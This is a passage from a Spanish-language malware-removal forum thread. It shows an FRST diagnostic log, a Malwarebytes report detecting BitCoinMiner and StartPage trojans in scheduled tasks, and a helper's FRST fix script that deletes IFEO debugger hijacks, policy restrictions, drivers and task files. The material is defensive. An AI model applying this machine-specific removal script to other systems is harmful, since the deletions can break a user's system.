FirewallRules: [{DC5E2C0F-A422-4A75-9C87-7E1B89872C09}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{BB3A7AE0-9645-46B6-AF41-B8420E114412}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{517DDE17-FC76-4510-88A3-2BAF847C4A35}] => (Allow) C:\Windows\SysWOW64\tracert.exe
FirewallRules: [{325DEF24-47C9-4B54-A4B4-6D5C449B2F60}] => (Allow) C:\Windows\SysWOW64\tracert.exe
FirewallRules: [{3507D4D1-DFF4-45D2-A4F6-E58706C66E00}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4E618052-FC31-45C7-B39A-1B3BEF786830}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D296730B-D193-4755-88CE-9EC5E1BDAA73}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{BE099B5D-6B5D-4154-9187-64D26EBC8A71}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D2A08889-54D7-4252-9184-9E809AA29127}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{65E59C96-EC75-4D42-87F1-E227E1845BBB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{17FD10F8-36E3-4170-88A9-23603B8FB3AC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FDCDA1E1-E786-455C-9937-EA01AE50A514}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{865094BC-09BB-419A-9A6F-DBC77D0BCE48}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{75184D7F-A6BD-48AE-9A38-EA3D8DEF1135}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{667F4FE4-19BD-4A9E-88C3-742A61DCC762}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{412B6EA7-EA02-47E0-887C-3C4F74D2E7B3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7190882D-40E5-4B2B-91D8-0B71A5C13465}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F579B865-195F-447F-9D31-1956F9131EC1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E678CB3E-2E04-4C0A-AC21-BD3458F10FB6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{591A4771-FCE9-4812-A007-B93A11CAE51D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{60A87213-0A67-44FC-A294-E508B0C0EDB3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C7D3870C-0913-48CD-B15F-8C23EC6ABED3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{00249744-B9F0-4E67-BA1D-B6B39D7634CF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A8AF9C66-2E7B-44B0-A49F-3CB2CF68CD23}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{78C0AE69-55D3-4653-A37D-8243E8830084}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A4CE280D-678F-4A07-90D7-218418F9153F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{267E224D-9853-4BCA-8CB2-81ABCA21FFF0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2CA45044-F558-438F-BED7-947905955D97}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6EA1E5D7-F19D-4B29-94EC-55B7DBE6218D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F813C8BA-5046-4A03-A85E-781B8D35C9FE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{010F2FBF-7C94-4BB5-9D6B-094F8CD632B3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E99510F7-8801-4B97-A8BA-0D015E4E044E}] => (Allow) C:\Windows\SysWOW64\tracert.exe
FirewallRules: [{D37521F9-0509-4184-924D-B7858F702FAA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C48225EB-ED0E-472F-BBBC-42651B4C618E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E6FAE525-5506-48B9-80DC-B58B20170787}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A5ABB09D-6EA8-416D-8F64-3B131E6B5C9F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{81F3ACBF-501F-4F55-A2A8-675D9DBCDA6B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E92C3A8A-ABAF-4B2A-85E4-0966CE153B73}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AAD11526-9E39-42A8-9CC5-113FA16FF258}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9CE7A7E7-BD35-4A69-8717-EE541E1B8CC1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C28A7561-EDBA-452E-A5D1-0286EAE126E8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3F1FDB82-8F95-4681-8D56-3603DC6B1987}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{709486D8-AAF8-483E-9A3C-C3B7F2EAF58C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{718EE098-E77F-45F7-B9C9-24546E9B5929}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{29D889F7-12FC-4451-AB3B-259E7B185359}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{68E30B12-9D3D-463B-9CE1-8B0CFD3A03EA}] => (Allow) C:\Windows\SysWOW64\tracert.exe
FirewallRules: [{388D3484-3BC1-4A80-BD4E-FB9EC2D080D7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D9D04AC3-B39F-46C7-AD62-FF2EE47D55E8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F98E6F6A-3CC8-4C4B-AB4B-71B22B872E62}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CBA22307-B5ED-4A92-B8ED-0C8C4C7A54AD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F92FDB73-2FCF-4A2D-80CB-E7597B8353C5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{275F3718-32E0-4415-B37D-DF362A8D5F82}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B8D3F27B-27B4-4158-91FA-F82F5A4BB73E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5419DA00-5A44-428B-9912-050CD0649F3B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6A1F8994-522B-472E-86A2-308D3D3D5AEF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EEA9D1FD-88C6-40DF-8368-4BA6FD5B3B06}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{74834575-A84E-4985-A0ED-203B3005166A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{519F7124-097D-41B8-A15F-57F776C7A1C3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8B55BAF3-576D-47D4-B868-1DB23F60DA4E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0AE26AB8-32A2-41A4-B141-5094A7768A87}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{670D81D0-094E-44E1-8900-06DA38EEE1C8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8659DFBA-6BA3-41F0-A575-67874893C722}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{44D2DD8D-F557-49ED-837E-D2A126FD36FA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1DF01419-7A0B-489F-8847-A915D5664249}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B59FC885-E163-4396-B0C9-05CFBE7CB294}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4001AC25-FC51-4FF7-9422-FBAD06B02CA0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{35DE7AAC-4AFC-4FA0-9B5A-9381513F3EFA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2679BADB-E1D8-4FC8-A1A5-F941A8416A50}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AFD18748-E8BF-4C36-9C84-4F7FB549AA48}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7119F598-BF33-415E-B3A5-545A327E04FB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CB5F67CC-105C-4846-9390-ACB8DE60DD11}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AC2CC445-7073-4667-BD40-78966B164F08}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E548850F-9A09-4E47-A815-0B1A6421828D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E06A8678-DFD9-4C96-9A9D-9B79EA20B4DD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0AC4F121-85B8-40F6-8D16-C58493AF66D0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AB273A8B-01C6-4BB7-BA81-F3D6BA048FE4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9C9B8113-A00A-41EF-A9EB-142A03E73AB7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0377EDC1-172D-4DD7-8FD3-8FCF0A607E17}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe
FirewallRules: [{89809B3C-D7A3-4818-902E-26C0F7AAC274}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe
FirewallRules: [{2A17A672-B1D1-4169-8F1C-3607DB24B749}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4B5CE0B9-47A4-4EC7-9B71-A35CF5BACCB5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{631A6B7B-14FA-400C-B034-A28336A47723}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{94AFCE07-4D92-408A-9AD6-B63487BF2FDA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{95CE2EC4-7D6E-4926-A871-B153E889B0A4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{83A6BD10-2508-4974-9C92-2C2107C1310A}] => (Allow) C:\Windows\SysWOW64\svchost.exe

==================== Restore Points =========================


==================== Faulty Device Manager Devices =============

Name: NetGroup Packet Filter Driver
Description: NetGroup Packet Filter Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: npf
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

#11
Application errors:
==================
Error: (10/18/2018 01:05:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (10/18/2018 01:05:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: AutoKMS.exe, versión: 2.4.9.0, marca de tiempo: 0x522118df
Nombre del módulo con errores: KERNELBASE.dll, versión: 6.1.7601.19135, marca de tiempo: 0x56a1c9ac
Código de excepción: 0xe0434352
Desplazamiento de errores: 0x000000000000965d
Id. del proceso con errores: 0x5fc
Hora de inicio de la aplicación con errores: 0x01d4670cf36b4257
Ruta de acceso de la aplicación con errores: C:\Windows\AutoKMS\AutoKMS.exe
Ruta de acceso del módulo con errores: C:\Windows\system32\KERNELBASE.dll
Id. del informe: 5f92a044-d300-11e8-8c9a-b778cc4e51b5

Error: (10/18/2018 01:05:03 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplicación: AutoKMS.exe
Versión de Framework: v4.0.30319
Descripción: el proceso terminó debido a una excepción no controlada.
Información de la excepción: System.Runtime.InteropServices.COMException
   en System.Runtime.InteropServices.Marshal.ThrowExceptionForHRInternal(Int32, IntPtr)
   en System.Management.ManagementObjectCollection+ManagementObjectEnumerator.MoveNext()
   en ..(System.String, System.String, System.String, .)
   en ...ctor()
   en ..(.)
   en ..()

Error: (10/18/2018 01:04:28 PM) (Source: MSSQL$TEW_SQLEXPRESS) (EventID: 9003) (User: )
Description: The log scan number (95:448:1) passed to log scan in database 'model' is not valid. This error may indicate data corruption or that the log file (.ldf) does not match the data file (.mdf). If this error occurred during replication, re-create the publication. Otherwise, restore from backup if the problem results in a failure during startup.

Error: (10/18/2018 01:03:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: mbamservice.exe, versión: 3.2.0.704, marca de tiempo: 0x5b9acf90
Nombre del módulo con errores: SelfProtectionSdk.dll, versión: 3.0.0.360, marca de tiempo: 0x5b995ba2
Código de excepción: 0x40000015
Desplazamiento de errores: 0x000000000014e2bf
Id. del proceso con errores: 0xcb4
Hora de inicio de la aplicación con errores: 0x01d466f8ab8de60e
Ruta de acceso de la aplicación con errores: C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
Ruta de acceso del módulo con errores: C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
Id. del informe: 0eaaf98e-d300-11e8-b5d0-df8ef6e1b3b2

Error: (10/18/2018 12:32:11 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa explorer.exe, versión 6.1.7601.19135, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

Identificador de proceso: e18

Hora de inicio: 01d466fa42267f2c

Hora de finalización: 0

Ruta de acceso de la aplicación: C:\Windows\explorer.exe

Identificador de informe:

Error: (10/18/2018 10:39:54 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (10/18/2018 10:39:37 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: AutoKMS.exe, versión: 2.4.9.0, marca de tiempo: 0x522118df
Nombre del módulo con errores: KERNELBASE.dll, versión: 6.1.7601.19135, marca de tiempo: 0x56a1c9ac
Código de excepción: 0xe0434352
Desplazamiento de errores: 0x000000000000965d
Id. del proceso con errores: 0x5f8
Hora de inicio de la aplicación con errores: 0x01d466f893e22281
Ruta de acceso de la aplicación con errores: C:\Windows\AutoKMS\AutoKMS.exe
Ruta de acceso del módulo con errores: C:\Windows\system32\KERNELBASE.dll
Id. del informe: 049f06d6-d2ec-11e8-b5d0-df8ef6e1b3b2


System errors:
=============
Error: (10/18/2018 01:04:28 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: El servicio SQL Server (TEW_SQLEXPRESS) se cerró con el error específico de servicio %%3414.

Error: (10/18/2018 01:04:27 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio NetGroup Packet Filter Driver no pudo iniciarse debido al siguiente error: 
El sistema no puede encontrar el archivo especificado.

Error: (10/18/2018 01:03:04 PM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: El servicio SolidWorks Electrical Collaborative Server informó de un estado actual 0 no válido.

Error: (10/18/2018 11:44:24 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (10/18/2018 10:38:48 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: El servicio SQL Server (TEW_SQLEXPRESS) se cerró con el error específico de servicio %%3414.

Error: (10/18/2018 10:38:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio NetGroup Packet Filter Driver no pudo iniciarse debido al siguiente error: 
El sistema no puede encontrar el archivo especificado.

Error: (10/18/2018 10:37:06 AM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: El servicio SolidWorks Electrical Collaborative Server informó de un estado actual 0 no válido.

Error: (10/18/2018 10:34:24 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 27%
Total physical RAM: 8137.88 MB
Available physical RAM: 5886.48 MB
Total Virtual: 16273.96 MB
Available Virtual: 13727.5 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:148.9 GB) (Free:20.46 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: () (Fixed) (Total:632 GB) (Free:5.22 GB) NTFS
Drive f: () (Fixed) (Total:150.51 GB) (Free:10.67 GB) NTFS
Drive g: () (Fixed) (Total:60 GB) (Free:18.4 GB) NTFS
Drive h: () (Fixed) (Total:110 GB) (Free:0.67 GB) NTFS
Drive i: () (Fixed) (Total:16.21 GB) (Free:13.14 GB) NTFS


==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 82FF4458)
Partition 1: (Active) - (Size=148.9 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=632 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=150.5 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 186.3 GB) (Disk ID: FDF5FDF5)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=60 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=110 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=16.2 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Lo del code para que no me funciona.


#12

El code hay que ponerlo al incio del texto, pero encima y no al lado de la primera linea.igual al final…se pone debajo de la ultima linea…

Ya lo he modificado, no te preocupes.

En cuanto revise bien, te pondré respuesta


#13

el malwarebytes bloqueo otras amenazas mientras usaba el PC aqui dejo el informe:

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 19/10/18
Hora del análisis: 9:03
Archivo de registro: b1392eae-d3a7-11e8-8b04-000000000000.json

-Información del software-
Versión: 3.6.1.2711
Versión de los componentes: 1.0.463
Versión del paquete de actualización: 1.0.7428
Licencia: Prueba

-Información del sistema-
SO: Windows 7 Service Pack 1
CPU: x64
Sistema de archivos: NTFS
Usuario: System

-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Programador de tareas
Resultado: Completado
Objetos analizados: 312241
Amenazas detectadas: 20
Amenazas en cuarentena: 0
Tiempo transcurrido: 10 min, 37 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)

Módulo: 0
(No hay elementos maliciosos detectados)

Clave del registro: 9
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5074E7C9-8B67-498E-B5FA-3D6C2BCC441E}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5074E7C9-8B67-498E-B5FA-3D6C2BCC441E}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{DA905C87-7E94-C064-9156-0FA60FF7E39B}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C10402EE-5A05-4161-AD27-A2192D3562CC}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C10402EE-5A05-4161-AD27-A2192D3562CC}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{AD1685E2-7536-7AF3-A95D-3F7867585C73}, Sin acciones por parte del usuario, [14191], [555894],1.0.7428
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A87F6214-B479-4A28-BD0C-028D27A1F05C}, Sin acciones por parte del usuario, [14191], [555894],1.0.7428
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{A87F6214-B479-4A28-BD0C-028D27A1F05C}, Sin acciones por parte del usuario, [14191], [555894],1.0.7428

Valor del registro: 0
(No hay elementos maliciosos detectados)

Datos del registro: 0
(No hay elementos maliciosos detectados)

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 0
(No hay elementos maliciosos detectados)

Archivo: 11
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}, Sin acciones por parte del usuario, [6036], [571190],1.0.7428
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{DA905C87-7E94-C064-9156-0FA60FF7E39B}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.StartPage.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{AD1685E2-7536-7AF3-A95D-3F7867585C73}, Sin acciones por parte del usuario, [14191], [555894],1.0.7428

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)

#15

Este ultimo analisis que me pones de Malwarebytes pone que no elimino nada “sin acciones por el usuario”

Marcaste y diste a enviar a cuarentena??

Compruebas estan esos elementos en cuarentena y si no repites el analisis


Bien… y ahora sigue estos pasos, MUY Importante ~ Realiza una copia de seguridad del registro :

  • Para hacerlo descarga Delfix en tu escritorio.

  • Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona "Ejecutar como Administrador.")

  • Atención, ahora marca/selecciona únicamente la casilla "Create registry backup", las demás NO

  • Pulsar en Run.

Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.


En el equipo con los demas programas cerrados:

Inicio >>> Ejecutar >>>Escribes notepad.exe.

Ahora copia y pega estos archivos dentro del Notepad:


Start
CreateRestorePoint:
CloseProcesses:

IFEO\ccd-uninst.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecdtray.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\databasecompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtagent.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtlauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\excel.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\fahconsole.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\helplauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\nitropdf.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\powerpnt.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\regclonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\spreadsheetcompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winword.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winzip64.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzbgtools.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzpreloader.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzupdatenotifier.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
U3 ai14l3mj; C:\Windows\System32\Drivers\ai14l3mj.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U0 aswVmm; no ImagePath
S2 npf; \??\C:\Windows\system32\drivers\npf.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2018-10-04 11:44 - 2018-10-08 10:48 - 000003726 _____ C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}
2018-10-04 11:44 - 2018-10-05 09:13 - 000003436 _____ C:\Windows\System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B}
2018-10-04 11:44 - 2018-10-04 11:44 - 000003562 _____ C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}
